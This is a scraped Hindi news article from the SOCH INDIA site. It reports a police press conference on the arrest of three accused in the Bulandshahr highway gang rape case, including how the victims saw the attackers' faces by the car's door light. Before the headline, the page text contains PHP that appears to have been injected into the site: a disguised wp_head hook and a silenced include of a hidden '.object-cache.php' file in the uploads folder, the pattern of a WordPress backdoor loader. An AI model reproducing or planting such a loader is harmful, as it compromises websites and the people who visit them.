add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बुलंदशहर गैंगरेपः पुलिस ने बताया अंधेरे में भी पीड़ितों ने कैसे देखा आरोपियों का चेहरा – SOCH INDIA
Menu

अपराध समाचार
बुलंदशहर गैंगरेपः पुलिस ने बताया अंधेरे में भी पीड़ितों ने कैसे देखा आरोपियों का चेहरा

nobanner

press conference of up police in matter of bulandshahr gangrape accused arrest

बुलंदशहर के एसपी सिटी मान सिंह चौहान ने बताया कि हाईवे गैंगरेप के मामले में आईजी सुजीत पांडेय ग्रेटर नोएडा के सूरजपुर पुलिस लाइन में प्रेस कांफ्रेंस कर रहे हैं।
आईजी ने कहा कि प्रदेश की कई जांच टीमें आरोपियों की खोज में लगाई गई थीं लेकिन तीनों आरोपियों के गिरफ्तारी में सफलता बुलंदशहर क्राइम ब्रांच को मिली।

अपनी इस प्रेस कांफ्रेंस में आईजी सुजीत ने बताया कि गैंगरेप में शामिल तीन आरोपी जो कल मेरठ से पकड़े गए हैं वो कन्नौज से हैं। वारदात को अंजाम देने के बाद इनमें से दो आरोपी झारखंड भाग गए थे।

एक बहुत बड़ी बात जो आईजी ने अपनी प्रेस कांफ्रेंस में उठाई कि ये सवाल उठ रहा है कि यह घटना रात में हुई तो अंधेरा होने के बावजूद पीड़ितों को आरोपियों का चेहरा कैसे दिख गया।

इसके बाद उन्होंने इसका जवाब देते हुए कहा कि आरोपी जब पीड़ित परिवार की कार के पास गए तो दरवाजा खोलने पर उसकी लाइट जली जिसमें पीड़ितों ने आरोपियों के चेहरे देखे।